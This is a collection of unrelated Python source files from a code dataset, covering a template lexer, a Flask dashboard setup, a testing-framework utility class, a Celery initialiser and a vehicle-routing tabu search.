if split[0] not in syntax.KEYWORDS:\n raise TemplateSyntaxError('Invalid keyword - {0}'.format(\n split[0]))\n\n def __repr__(self):\n return '{0}'.format(self.value)\n\n\nclass Lexer(object):\n \"\"\"A Regex based Lexer.\"\"\"\n\n def __init__(self, source_text):\n self._source_text = source_text.strip()\n self._source_list = [\n e for e in re.split(_RE_MEGA, self._source_text) if e\n ]\n self._pos = 0\n self.current = TOKEN_INITIAL\n self._buffer = deque()\n\n def push(self, item):\n self._buffer.append(item)\n\n def peek(self):\n \"\"\"\n Look ahead in the current stream,\n and return the next token. This does not\n affect the stream iterator.\n \"\"\"\n pass\n\n def __iter__(self):\n \"\"\"\n Generator stream that returns the next token in our buffer.\n \"\"\"\n #if self._pos >= len(self._source_text):\n # raise StopIteration\n #else:\n # print(self._source_list)\n # import pdb; pdb.set_trace()\n for text in self._source_list:\n self.current = Token(text)\n yield self.current\n\n\ndef tokenize(source):\n return iter(Lexer(source))\n\n\nif __name__ == '__main__':\n\n source = \"\"\"\nHello, {{ name }}!!
\n\n {% for item in list %}\n {% if item %}\n {{ item }}
\n {% else %}\n {{ item }}
\n {% endif %}\n {% endfor %}\n\n\"\"\"\n lexer = Lexer(source)\n for i in lexer:\n print(i)\n","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"8764921","text":"import arcpy,sys, string, os, arcgisscripting\ngp = arcgisscripting.create(10.0)\nfc = gp.GetParameterAsText(0) \nfd = gp.GetParameterAsText(1)\nrows = arcpy.SearchCursor(fc)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\nvalues=[int(row.getValue(fd)) for row in rows]\t\t\nvalues.sort()\nfor i in range(1,max(values)):\n\tif i not in values:\n\t\tarcpy.AddMessage(str(i))\ndel rows","sub_path":"脚本/查找漏码.py","file_name":"查找漏码.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"164319767","text":"import requests\nfrom flask import Flask\n\napp = Flask(__name__)\n\napp.config.update(\n SECRET_KEY='A0Zr98j/3yX R~XHH!jmN]LWX/,?RT',\n DEBUG=False,\n HOST='localhost',\n PORT=8888,\n BRENDER_SERVER='localhost:9999'\n)\n\n\ndef check_connection(host_address):\n try:\n http_request(host_address, '/')\n return \"online\"\n except:\n return \"offline\"\n\n\ndef http_request(ip_address, method, post_params=False):\n \"\"\"Utils function used to communicate with the server\n \"\"\"\n if post_params:\n r = requests.post('http://' + ip_address + method, data=post_params)\n else:\n r = requests.get('http://' + ip_address + method)\n return r.json()\n\n\ndef list_integers_string(string_list):\n \"\"\"Accepts comma separated string list of integers\n \"\"\"\n integers_list = string_list.split(',')\n integers_list = map(int, integers_list)\n return integers_list\n\nfrom dashboard.controllers.main import main\nfrom dashboard.controllers.shots import shots\nfrom dashboard.controllers.workers import workers\nfrom dashboard.controllers.settings import settings\nfrom dashboard.controllers.shows import shows\napp.register_blueprint(main)\napp.register_blueprint(shots, url_prefix='/shots')\napp.register_blueprint(workers, url_prefix='/workers')\napp.register_blueprint(settings, url_prefix='/settings')\napp.register_blueprint(shows, url_prefix='/shows')\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('404_error.html'), 404\n\n\ndef run(user_config=None):\n config = app.config\n\n if user_config:\n config.from_object(user_config)\n\n config.update(\n SERVER_NAME=\"%s:%s\" % (config['HOST'], config['PORT'])\n )\n\n app.run(config['HOST'], config['PORT'])\n","sub_path":"brender/dashboard/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"298798354","text":"'''\nСписок [16, -17, 2, 78.7, False, False,\n{‘True’: True}, 555, 12, 23, 42, ‘DD’] \nФункция, принимает на вход список \n-выбирает из него все int и float \n-составить из него новый список,\nотсортированный от наименьшего значения большему.\n'''\ncpicok = [16, -17, 2, 78.7, False, False, {'True': True}, 555, 12, 23, 42, 'DD']\ndef filt(lis):\n\tcpicok2 =[\n\tbox\n\tfor box in lis\n\t\tif type(box) in [int,float]\n\t\t]\n\tcpicok2.sort()\n\treturn cpicok2\nprint(filt(cpicok))\n \n\n# не успел =(","sub_path":"HomeWork 2/HomeWork-13.py","file_name":"HomeWork-13.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"505151266","text":"import requests\nimport json\nimport uuid\nimport os, re\nfrom subprocess import Popen, PIPE\nfrom xml.etree.ElementTree import Element, SubElement, tostring\nfrom bs4 import BeautifulSoup\nfrom .client import Client\nimport logging\nimport time\nimport configparser\nfrom cockpit_testing.Framework.utils.blueprintExecutionTime import ExecutionTime\nfrom random import randint\nfrom cockpit_testing.Framework.utils.skiptest import skiptests\nclass BaseTest(object):\n def __init__(self):\n self.clone = False\n self.account = ''\n self.account_id = ''\n self.logging = logging\n #self.log()\n self.values = {'environment': '',\n 'username': '',\n 'password': '',\n 'location': '',\n 'account': '',\n 'cockpit_url': '',\n 'client_id': '',\n 'client_secret': '',\n 'jwt': '',\n 'repo': '',\n 'branch': '',\n 'threads_number': ''\n }\n self.get_config_values()\n # self.get_jwt()\n self.header = {'Authorization': 'bearer ' + self.values['jwt'],\n 'content-type': 'application/json'}\n\n self.Testcases_results = {'Blueprint Name': ['Test Result', 'Execution Time']}\n self.requests = requests\n self.execution_time = ExecutionTime\n self.skiptests=skiptests.copy()\n\n def setup(self):\n self.get_testcases_templates()\n\n if not self.values['password']:\n self.values['password'] = str(input(\"Please, Enter %s's password : \" % self.values['username']))\n\n def teardown(self):\n print(' [*] Execute teardown method .... ')\n # Delete account\n if not self.account_id:\n self.get_account_ID(account=self.account)\n\n api = 'https://' + self.values['environment'] + '/restmachine/cloudbroker/account/delete'\n client_header = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'}\n client_body = {'accountId': self.account_id,\n 'reason': 'TearDown by Cockpit Driver'}\n client_response = self.client._session.post(url=api, headers=client_header, data=client_body)\n if client_response.status_code == 200:\n self.logging.info('DONE: Delete %s account' % self.values['account'])\n print(' [*] DONE: Deleted %s account' % self.values['account'])\n else:\n client_response.raise_for_status()\n\n @staticmethod\n def random_string():\n return str(uuid.uuid4()).replace(\"-\", \"\")[:10]\n\n @staticmethod\n def random_integer(min_val, max_val):\n return randint(int(min_val), int(max_val))\n\n def build_api(self, api_list):\n api = self.values['cockpit_url'] + '/'\n for value in api_list:\n api += value + '/'\n return api[:-1]\n\n @staticmethod\n def build_json(data):\n # This method take dict data and return json data.\n return json.dumps(data)\n\n def get_config_values(self):\n script_dir = os.path.dirname(__file__)\n config_file = \"../../Config/config.ini\"\n config_path = os.path.join(script_dir, config_file)\n config = configparser.ConfigParser()\n config.read(config_path)\n section = config.sections()[0]\n options = config.options(section)\n for option in options:\n value = config.get(section, option)\n self.values[option] = value\n\n def create_account(self):\n # create new account\n if not self.values['account']:\n self.logging.info(' [*] Create new account .... ')\n print(' [*] Create new account .... ')\n self.account = self.random_string()\n api = 'https://' + self.values['environment'] + '/restmachine/cloudbroker/account/create'\n client_header = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'}\n client_data = {'name': self.account,\n 'username': self.values['username'],\n 'maxMemoryCapacity': -1,\n 'maxVDiskCapacity': -1,\n 'maxCPUCapacity': -1,\n '&maxNASCapacity': - 1,\n 'maxArchiveCapacity': -1,\n 'maxNetworkOptTransfer': - 1,\n 'maxNetworkPeerTransfer': - 1,\n 'maxNumPublicIP': - 1,\n 'location': self.values['location']}\n client_response = self.client._session.post(url=api, headers=client_header, data=client_data)\n\n if client_response.status_code == 200:\n self.account_id = client_response.text\n self.values['account'] = self.account\n self.logging.info(' [*] DONE : Create %s account' % self.account)\n else:\n self.logging.error(' [*] ERROR : response status code %i' % client_response.status_code)\n self.logging.error(' [*] ERROR : response content %s' % client_response.content)\n client_response.raise_for_status()\n else:\n self.account = self.values['account']\n self.get_account_ID(self.account)\n self.logging.info(' [*] Use %s account' % self.values['account'])\n\n def run_cmd_via_subprocess(self, cmd):\n sub = Popen([cmd], stdout=PIPE, stderr=PIPE, shell=True)\n out, err = sub.communicate()\n if sub.returncode == 0:\n return out.decode('utf-8')\n else:\n error_output = err.decode('utf-8')\n raise RuntimeError(\"Failed to execute command.\\n\\ncommand:\\n{}\\n\\n\".format(cmd, error_output))\n\n def get_testcases_templates(self):\n repo = self.values['repo']\n branch = self.values['branch']\n bps_driver_path = 'TestCasesTemplate'\n if 'https' in repo:\n temp = repo.split('/')[-1]\n repo_name = temp[:temp.find('.')]\n else:\n match = re.search(r'/(\\S+).git', repo)\n repo_name = match.group(1)\n\n # make directory to clone repos on\n if self.clone:\n dir_path = os.getcwd() + '/cockpit_testing/Framework/%s' % bps_driver_path\n if os.path.exists(dir_path):\n self.run_cmd_via_subprocess('rm -rf %s' % dir_path)\n self.run_cmd_via_subprocess('cd cockpit_testing/Framework/; mkdir %s' % bps_driver_path)\n dirs = self.run_cmd_via_subprocess('ls').split('\\n')[:-1]\n if 'repos' not in dirs:\n print(' [*] create repos directory')\n self.run_cmd_via_subprocess('mkdir repos')\n else:\n print(' [*] repos directory already exists')\n\n dirs = self.run_cmd_via_subprocess('ls repos').split('\\n')[:-1]\n if repo_name in dirs:\n self.run_cmd_via_subprocess('cd repos; rm -rf %s' % repo_name)\n print(' [*] clone repo %s' % repo)\n print(' [*] branch %s' % branch)\n self.run_cmd_via_subprocess('cd repos; git clone -b %s %s' % (branch, repo))\n # copy blueprints test templates\n self.run_cmd_via_subprocess(\n 'cp -r repos/%s/tests/bp_test_templates/. cockpit_testing/Framework/%s' % (repo_name, bps_driver_path))\n\n def get_jwt(self):\n client_id = self.values['client_id']\n client_secret = self.values['client_secret']\n\n params = {\n 'grant_type': 'client_credentials',\n 'client_id': client_id,\n 'client_secret': client_secret\n }\n\n url = 'https://itsyou.online/v1/oauth/access_token?'\n resp = requests.post(url, params=params)\n resp.raise_for_status()\n access_token = resp.json()['access_token']\n url = 'https://itsyou.online/v1/oauth/jwt'\n headers = {'Authorization': 'token %s' % access_token}\n data = {'scope': 'user:memberOf:%s' % client_id}\n resp = requests.post(url, data=json.dumps(data), headers=headers)\n self.values['jwt'] = resp.content\n\n def generate_xml_results(self):\n print(' [*] Generate XML results')\n Succeeded = 0\n Errors = 0\n Failures = 0\n Skip = 0\n # remove first one\n self.Testcases_results.pop(\"Blueprint Name\")\n\n for key in self.Testcases_results:\n for item in self.Testcases_results[key]:\n if 'ERROR' in item[0]:\n Errors += 1\n break\n elif 'FAILED' in item[0]:\n Failures += 1\n break\n elif 'Skip' in item[0]:\n Skip += 1\n break\n elif 'OK' in item[0]:\n Succeeded += 1\n break\n elif 'Time' in item[0]:\n continue\n else:\n print('The result is missing an indicator element')\n break\n\n testsuit_params = {'name': 'Cockpit_Testing',\n 'tests': str(len(self.Testcases_results)),\n 'succeeded': str(Succeeded),\n 'errors': str(Errors),\n 'failures': str(Failures),\n 'skip': str(Skip)}\n\n testsuit = Element('testsuite', testsuit_params)\n\n for key in self.Testcases_results:\n testcase_params = {'classname': \"/cockpit_testing/Framework/TestCases/\" + key,\n 'name': key,\n 'time': str(self.Testcases_results[key][0][1])}\n\n testcase = SubElement(testsuit, 'testcase', testcase_params)\n for item in self.Testcases_results[key]:\n if 'ERROR' in item[0]:\n error = SubElement(testcase, 'error')\n error_message = str(item[0])\n service_name = str(item[1])\n error.text = \" service: %s - Message: %s\" % (service_name, error_message)\n elif 'FAILED' in item[0]:\n failuer = SubElement(testcase, 'failure')\n failuer_message = str(item[0])\n service_name = str(item[1])\n failuer.text = \" service: %s - Message: %s\" % (service_name, failuer_message)\n elif 'Skip' in item[0]:\n skipped = SubElement(testcase, 'skipped')\n skipped_message = str(item[2])\n service_name = str(item[3])\n skipped.text = \" service: %s - Message: %s\" % (service_name, skipped_message)\n resultFile = open('testresults.xml', 'w')\n resultFile.write(BeautifulSoup((tostring(testsuit)), 'xml').prettify())\n\n def get_jobs(self, specific_blueprint_list):\n # Return : All paths which is under TestCases dir.\n utils_dir = os.path.dirname(__file__)\n test_cases_directory = os.path.join(utils_dir, \"../TestCases/\")\n test_cases_files = os.listdir(test_cases_directory)\n test_cases_path = []\n skip_testcases=[]\n if specific_blueprint_list:\n for specific_blueprint in specific_blueprint_list:\n if '.yaml' not in specific_blueprint:\n specific_blueprint += '.yaml'\n\n if specific_blueprint in self.skiptests:\n print((' [*] Test case : %s --skip' % specific_blueprint))\n self.Testcases_results[specific_blueprint] = [['Skip', 0, skiptests[specific_blueprint], specific_blueprint]]\n skip_testcases.append(specific_blueprint)\n continue\n\n for file in test_cases_files:\n if specific_blueprint != file:\n continue\n else:\n test_cases_path.append(os.path.join(test_cases_directory, file))\n break\n else:\n for file in test_cases_files:\n if file in self.skiptests:\n print((' [*] Test case : %s --skip' % file))\n self.Testcases_results[file] = [['Skip', 0, skiptests[file], file]]\n skip_testcases.append(file)\n continue\n test_cases_path.append(os.path.join(test_cases_directory, file))\n\n if len(test_cases_path) == 0 and len(test_cases_files) > 0 and len(skip_testcases) == 0:\n raise NameError('There is no %s blueprint in TestCases dir' % str(specific_blueprint_list))\n return test_cases_path\n\n def log(self, log_file_name='log.log'):\n self.logging.basicConfig(filename=log_file_name, filemode='w', level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n '''\n How to use:\n self.logging.debug(\"This is a debug message\")\n self.logging.info(\"Informational message\")\n self.logging.error(\"An error has happened!\")\n '''\n\n def request_handling(self, method, api, headers, body, expected_responce_code=200):\n # This method handle the api request errors for 10 times.\n\n if method not in ['post', 'get', 'delete']:\n raise NameError(\" [*] %s method isn't handled\" % method)\n\n for _ in range(30):\n try:\n if method == 'get':\n response = self.requests.get(url=api, headers=headers, data=body)\n elif method == 'post':\n response = self.requests.post(url=api, headers=headers, data=body)\n elif method == 'delete':\n response = self.requests.delete(url=api, headers=headers, data=body)\n\n if response.status_code == expected_responce_code:\n return [True, response]\n else:\n time.sleep(2)\n # print response.url, response.status_code, response.content\n except:\n time.sleep(2)\n\n return [False, response]\n\n def get_client(self):\n for _ in range(30):\n try:\n self.client = Client('https://' + self.values['environment'], self.values['username'],\n self.values['password'])\n break\n except:\n time.sleep(1)\n else:\n self.client = Client('https://' + self.values['environment'], self.values['username'],\n self.values['password'])\n\n def get_account_ID(self, account):\n client_header = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'}\n self.logging.info(' [*] Get %s account ID .... ' % account)\n api = 'https://' + self.values['environment'] + '/restmachine/cloudapi/accounts/list'\n client_response = self.client._session.post(url=api, headers=client_header)\n\n if client_response.status_code == 200:\n for element in client_response.json():\n if account == element['name']:\n self.account_id = element['id']\n self.logging.info(' [*] DONE : Account ID : % d' % self.account_id)\n break\n else:\n self.logging.error(\n \" [*] ERROR : Can't get %s account ID. Please, Make sure that %s username can get this account ID\" % (\n account, self.values['username']))\n print(\n \" [*] ERROR : Can't get %s account ID. Please, Make sure that %s username can get this account ID\" % (\n account, self.values['username']))\n raise NameError(\n \" [*] ERROR : Can't get '%s' account ID. Please, Make sure that '%s' username can get this account ID\" % (\n account, self.values['username']))\n else:\n self.logging.error(' [*] ERROR : response status code %i' % client_response.status_code)\n self.logging.error(' [*] ERROR : response content %s' % client_response.content)\n client_response.raise_for_status()\n\n def check_cockpit_is_exist(self):\n tmp = self.values['cockpit_url']\n url = tmp[:tmp.find(':5')]\n\n try:\n response = self.requests.get(url=url)\n if response.status_code != 200:\n self.logging.error('ERROR : response status code %i' % response.status_code)\n self.logging.error('ERROR : response content %s ' % response.content)\n raise NameError('ERROR : response status code %i' % response.status_code)\n except:\n self.logging.error(\"Can't Create a connection to the '%s' cockpit machine\" % url)\n raise NameError(\"Can't Create a connection to the '%s' cockpit machine\" % url)\n\n def get_waiting_time(self, bpFileName):\n if bpFileName in self.execution_time:\n time = self.execution_time[bpFileName]\n if time > 10:\n return int(time / 10)\n else:\n return int(time)\n","sub_path":"cockpit_testing/Framework/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327355163","text":"#!/usr/bin/env python3\n\nimport Tipo, TipoDAO\nfrom FormatData import FormatData\n\ntipo = Tipo.Tipo()\ntipoDAO = TipoDAO.TipoDAO()\n\nprint(\"Content-type: text/html\\n\")\n\n\nprint(\n\"\"\"\n\n\n\t\n\t\t\n\t\n\t\n\t\tTipos de Compromissos!!!
\n\t\tNovo
\n\"\"\")\n\nfor tipo in tipoDAO.getLista():\n\tprint(\\\n\t\t\"\t\t{}
\".format(\\\n\t\t\ttipo.getCOD_TIPO(),\\\n\t\t\ttipo.getTIPO()\n\t\t))\n\nprint(\n\"\"\"\n\n\n\"\"\")\n","sub_path":"cgi-bin/tipos.py","file_name":"tipos.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494836391","text":"from os import environ\n\nfrom celery import Celery\nfrom kombu import Exchange, Queue, binding\n\n\ndef init_celery(name, tasks_pkg, routing_keys):\n \"\"\"\n Initializing celery to point to a rabbitmq type of broker\n\n Args:\n name (str): Name for the app. Will also be used as the default queue name.\n Will be one of ['consumer', 'producer']\n tasks_pkg (str): Package where tasks for the app being created are located.\n will be either kubernetes_test.producer or kubernetes_test.consumer\n routing_keys (list): List of routing keys to listen on for messages.\n\n Returns:\n Celery: Celery app object\n \"\"\"\n\n # Create celery app\n app = Celery(\n 'kubernetes_test.{}'.format(name),\n broker=environ['BROKER_CNX_STRING']\n )\n\n # Discover tasks appropriate to tge app being created\n app.autodiscover_tasks([tasks_pkg], force=True)\n\n # Set the default queue name so it matches the app name for easy identification\n app.conf.task_default_queue = name\n\n # use ts.messaging exchange\n messaging_exchange = Exchange('ts.messaging')\n\n # add the default queue name to the routing keys list\n routing_keys.append(app.conf.task_default_queue)\n\n bindings = (\n binding(messaging_exchange, routing_key=routing_key)\n for routing_key in routing_keys\n )\n\n app.conf.task_queues = [\n Queue(name, list(bindings))\n ]\n\n return app\n","sub_path":"kubernetes_test/factory/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"584325365","text":"from itertools import combinations\nimport copy\n\ndistance_mtrx = [[0, 3, 26, 55, 42, 56, 63, 9, 100],\n [3, 0, 3, 5, 4, 7, 4, 2, 3],\n [26, 3, 0, 2, 6, 3, 6, 8, 6],\n [55, 5, 2, 0, 5, 5, 9, 5, 5],\n [42, 4, 6, 5, 0, 2, 5, 8, 2],\n [56, 7, 3, 5, 2, 0, 6, 4, 6],\n [63, 4, 6, 9, 5, 6, 0, 2, 8],\n [9, 2, 8, 5, 8, 4, 2, 0, 3],\n [100, 3, 6, 5, 2, 6, 8, 3, 0]]\n\nservice_time_in = [[0, 100],\n [24, 35],\n [20, 25],\n [13, 15],\n [14, 23],\n [34, 46],\n [87, 102],\n [80, 89],\n [0, 500]\n ]\n\npickup_delivery_time_in = [[0, 0],\n [2, 3],\n [3, 5],\n [4, 2],\n [5, 2],\n [2, 5],\n [4, 4],\n [3, 6],\n [0, 0]]\n\ntabu_list = []\n\n\n# cost minimization function --- min(t[i][j]+wait_time[j])\ndef get_heuristic(src, dest, service_start_time):\n wait = get_earliest_service_time(dest) - service_start_time - get_distance(src, dest) - get_pickup_time(src\n ) - get_delivery_time(\n src)\n wait = wait if wait > 0 else 0\n print('waiting time : {0} Distance : {1}'.format(wait, get_distance(src, dest)))\n return get_distance(src, dest) + wait\n\n\ndef generate__initial_solution():\n numOfV = 3\n setOfV = range(1, numOfV + 1)\n routes = [[]] # zero indexed route kept empty to maintain meaningful reference\n service_start_time = [[]]\n cost_data = [[]]\n unserviced = list(range(1, len(distance_mtrx) - 1))\n k = 1\n while len(unserviced) > 0 and k in setOfV: # Vehicle level loop\n routes.append([0])\n service_start_time.append([0])\n cost_data.append([0])\n best_nbr = 0\n minim = 1000000\n end_node = len(distance_mtrx) - 1\n no_progress = False\n route_index = 1\n while len(\n unserviced) > 0 and not no_progress: # Route level loop for vehicle gives route for vehicle when completed\n\n visiting = best_nbr\n print('----------------------------------------------------------------')\n print('starting looking up best next node for : {0}'.format(visiting))\n no_progress = False\n minim = 100000\n for i in range(1, len(distance_mtrx) - 1): # finding best neighbour\n if i == visiting or not is_servisable(visiting, i, service_start_time[k][\n route_index - 1]) or i not in unserviced:\n no_progress = True\n continue\n no_progress = False\n print('checking cost for : {0}'.format(i))\n cost1 = get_heuristic(visiting, i, service_start_time[k][route_index - 1])\n if int(cost1) < int(minim) and i not in routes[k] and i != end_node and i in unserviced:\n minim = cost1\n if len(cost_data[k]) < route_index + 1:\n cost_data[k].append(0)\n if len(routes[k]) < route_index + 1:\n routes[k].append(0)\n if len(service_start_time[k]) < route_index + 1:\n service_start_time[k].append(0)\n cost_data[k][route_index] = minim\n routes[k][route_index] = i\n best_nbr = i\n print('now best next node for : {0} is {1}'.format(visiting, i))\n service_start_time[k][route_index] = get_service_start_time(i, service_start_time[k][\n route_index - 1], visiting)\n # print(no_progress)\n if best_nbr != 0:\n unserviced.remove(best_nbr)\n route_index = route_index + 1\n routes[k].append(end_node)\n cost_data[k].append(distance_mtrx[routes[k][-2]][end_node])\n k = k + 1\n\n if len(unserviced) > 0:\n print('making route for customer which are not serviced due to delay the route will be used during tabu search')\n routes.append([0])\n for i in unserviced:\n routes[k].append(i)\n routes[k].append(len(distance_mtrx) - 1)\n print(routes[k])\n\n for route in routes:\n if is_empty_route(route):\n print('removing empty routes that is from start depot to end depot only')\n cost_data.remove(cost_data[routes.index(route)])\n routes.remove(route)\n return cost_data, routes\n\n\ndef is_servisable(src, dest, src_service_start_time):\n if get_distance(src, dest) + src_service_start_time + get_pickup_time(src) + get_delivery_time(\n src) > get_latest_service_time(dest):\n return False\n return True\n\n\ndef get_delay(src, dest, si_src):\n return service_time_in[dest][1] - distance_mtrx[src][dest] - pickup_delivery_time_in[src][0] - \\\n pickup_delivery_time_in[src][1] - si_src\n\n\ndef get_exchange_neighbour(soln):\n neighbours = []\n for combo in list(combinations(soln, 2)):\n for i in combo[0][:-1]:\n for j in combo[1][:-1]:\n if i == 0 or j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[0])\n _c1 = copy.deepcopy(combo[1])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[0]))\n _c1.insert(_c1.index(j), i)\n _c0.insert(_c0.index(i), j)\n _c1.remove(j)\n _c0.remove(i)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (3, j, i, idx2, idx1, 3)))\n\n for i in combo[1][1:-1]:\n for j in combo[0][1:-1]:\n if i == 0 or j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[1])\n _c1 = copy.deepcopy(combo[0])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[1]))\n _c1.insert(_c1.index(j), i)\n _c0.insert(_c0.index(i), j)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (3, j, i, idx2, idx1, 3)))\n\n # print(\"{0} number of Neighbours after Exchange {1}\".format(len(neighbours), neighbours))\n neighbours.sort(key=lambda x: x[1][-1])\n print(\"{0} number of sorted Neighbours after exchange {1}\".format(len(neighbours), neighbours))\n return neighbours[0]\n\n\ndef get_relocate_neighbour(soln):\n neighbours = []\n for combo in list(combinations(soln, 2)):\n for i in combo[0][:-1]:\n for j in combo[1][:-1]:\n if j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[0])\n _c1 = copy.deepcopy(combo[1])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[0]))\n _c1.remove(j)\n _c0.insert(_c0.index(i) + 1, j)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (1, j, i, idx2, idx1, 3)))\n\n for i in combo[1][:-1]:\n for j in combo[0][:-1]:\n if j == 0:\n continue\n _tmp = copy.deepcopy(soln)\n _c0 = copy.deepcopy(combo[1])\n _c1 = copy.deepcopy(combo[0])\n idx1 = _tmp.index(_c0)\n idx2 = _tmp.index(_c1)\n if contains(tabu_list, lambda x: x.found_match((j, i, idx1, idx2))):\n continue\n print('removing {0} from {1}'.format(i, combo[1]))\n _c1.remove(j)\n _c0.insert(_c0.index(i) + 1, j)\n _tmp[idx1] = _c0\n _tmp[idx2] = _c1\n neighbours.append((_tmp, get_solution_cost(_tmp), (1, j, i, idx2, idx1, 3)))\n\n # print(\"{0} number of Neighbours after relocation {1}\".format(len(neighbours), neighbours))\n neighbours.sort(key=lambda x: x[1][-1])\n print(\"{0} number of sorted Neighbours after relocation {1}\".format(len(neighbours), neighbours))\n return neighbours[0]\n\n\ndef get_neighbours(op, soln):\n if op == 1:\n # relocate op\n return get_relocate_neighbour(soln)\n elif op == 2:\n # relocate split op\n # return get_relocate_split_neighbour(soln)\n pass\n elif op == 3:\n return get_exchange_neighbour(soln)\n elif op == 4:\n # return get_2opt_neighbour(soln)\n pass\n\n\ndef get_solution_cost(soln: list):\n t = 0\n wait = 0\n delay = 0\n for route in soln:\n prev = 0\n for customer in route:\n t = t + get_distance(prev, customer) + get_pickup_time(prev) + get_delivery_time(prev)\n wait = wait + ((get_earliest_service_time(customer) - t) if (get_earliest_service_time(\n customer) - t) > 0 else 0)\n delay = delay + ((t - get_latest_service_time(customer)) if (t - get_latest_service_time(\n customer)) > 0 else 0)\n prev = customer\n\n return t, delay, wait, t + delay + wait\n\n\ndef tabu_search(routes: list, itrations):\n best_soln = routes\n best_cost = ()\n for i in range(itrations - 1):\n _sol1 = get_neighbours(1, best_soln)\n _sol2 = get_neighbours(3, best_soln)\n if _sol1[1][-1] < _sol2[1][-1]:\n best_soln = _sol1[0]\n best_cost = _sol1[1]\n tabu_list.append(TabuListClass(_sol1[2][0], _sol1[2][1:-1], _sol1[2][-1]))\n else:\n best_soln = _sol2[0]\n best_cost = _sol2[1]\n tabu_list.append(TabuListClass(_sol1[2][0], _sol1[2][1:-1], _sol1[2][-1]))\n\n return best_soln, best_cost\n\n\n# input provider methods\ndef get_distance(src, dest):\n return distance_mtrx[src][dest]\n\n\ndef get_pickup_time(cust):\n return pickup_delivery_time_in[cust][0]\n\n\ndef get_delivery_time(cust):\n return pickup_delivery_time_in[cust][1]\n\n\ndef get_earliest_service_time(cust):\n return service_time_in[cust][0]\n\n\ndef get_latest_service_time(cust):\n return service_time_in[cust][1]\n\n\ndef get_service_start_time(cust, prev_cust_service_start_time, prev_cust):\n time_distance = prev_cust_service_start_time + get_delivery_time(prev_cust) + get_pickup_time(\n prev_cust) + get_distance(prev_cust, cust)\n if time_distance > get_earliest_service_time(cust):\n return time_distance\n else:\n return get_earliest_service_time(cust)\n\n\ndef is_empty_route(route: list):\n if len(route) == 2 and 0 in route and len(distance_mtrx) - 1 in route:\n return True\n return False\n\n\ndef contains(list, filter):\n for x in list:\n if filter(x):\n return True\n return False\n\n\nclass TabuListClass:\n def __init__(self, op, move, valid_for):\n self.op = op\n self.move = move\n self.valid_for = valid_for\n\n def checked(self):\n self.valid_for -= 1\n\n def found_match(self, move):\n if self.move == move and self.valid_for > 0:\n print(\"found tabu match op : {0} move : {1}\".format(self.op, self.move))\n self.valid_for -= 1\n return True\n return False\n\n\ncost, routes = generate__initial_solution()\nprint(\"Best solution: {0}, with total cost: {1}\".format(routes, cost))\nroutes.remove([])\nbest_soln, best_cost = tabu_search(routes, 20)\nprint(\"solution is : {0} with costs : {1}\".format(best_soln, best_cost))\nfor route in best_soln:\n print(\"Route{0} is: {1}\".format(best_soln.index(route), route))\n\nprint(\"total distance: {0}\".format(best_cost[0]))\nprint(\"total waiting: {0}\".format(best_cost[1]))\nprint(\"total delay: {0}\".format(best_cost[2]))\nprint(\"total cost: {0}\".format(best_cost[3]))\n","sub_path":"greedy_with_delay.py","file_name":"greedy_with_delay.py","file_ext":"py","file_size_in_byte":12666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
